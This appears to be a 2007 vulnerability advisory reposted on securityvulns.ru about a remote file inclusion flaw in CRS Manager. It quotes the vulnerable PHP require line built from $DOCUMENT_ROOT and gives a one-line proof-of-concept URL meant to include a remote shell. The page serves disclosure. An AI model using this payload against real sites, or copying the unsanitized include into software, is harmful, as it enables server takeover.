Computer Security
[EN] securityvulns.ru
no-pyccku

  

Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Aria-Security Team] social-networkin SQL Injection

  NuclearBB Alpha 2 Remote File Inclusion

  Husrev Forums v2.0.1:PoWerBoard Sql

  Proxy Anket v3.0.1 Sql injection Vulnerable

From:Ivan Niiiil <insp0w3r_(at)_gmail.com>
Date:11.09.2007
Subject:CRS Manager ($DOCUMENT_ROOT) Multi Remote File Include

#######################################
X---- w w w . u N k n 0 w n . e u ----X
#######################################


CRS Manager(crsmanager) Multi Remote File Include

::Home:
 http://crsmanager.berlios.de

::Vuln Type :
 Remote File Include (RFI)

::Discovered by :
 iNs


::Vuln Code:
index.php
login.php

<?php
require ($DOCUMENT_ROOT."/../admin/settings/conf.php");


PoC:
index.php?DOCUMENT_ROOT=shell??


:: iNs @ uNkn0wn.eu ::

::Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru